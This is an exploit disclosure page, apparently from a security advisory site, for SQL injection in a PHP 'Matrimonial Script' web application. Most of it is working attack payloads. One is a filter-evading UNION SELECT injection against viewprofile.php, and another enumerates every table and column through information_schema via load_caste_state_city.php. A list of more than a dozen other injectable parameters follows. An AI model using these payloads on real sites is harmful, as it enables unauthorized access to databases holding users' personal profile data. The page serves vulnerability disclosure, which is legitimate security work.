Matrimonial Script - SQL Injection

2017.08.24
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# # # # # # Exploit Title: Matrimonial Script - SQL Injection # Dork: N/A # Date: 22.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Demo: http://www.mscript.in/matrimonial-demo.html # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/viewprofile.php?id=[SQL] # # -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+- # # http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL] # # -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+- # # http://localhost/[PATH]/printprofile.php?id=[SQL] # http://localhost/[PATH]/viewphoto.php?id=[SQL] # http://localhost/[PATH]/advsearch_results.php?gender=[SQL] # http://localhost/[PATH]/advsearch_results.php?age1=[SQL] # http://localhost/[PATH]/advsearch_results.php?age2=[SQL] # http://localhost/[PATH]/advsearch_results.php?religion=[SQL] # http://localhost/[PATH]/advsearch_results.php?caste=[SQL] # http://localhost/[PATH]/advsearch_results.php?ms=[SQL] # http://localhost/[PATH]/advsearch_results.php?language=[SQL] # http://localhost/[PATH]/advsearch_results.php?edu=[SQL] # http://localhost/[PATH]/advsearch_results.php?occu=[SQL] # http://localhost/[PATH]/advsearch_results.php?country=[SQL] # # Etc.. # # # # #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top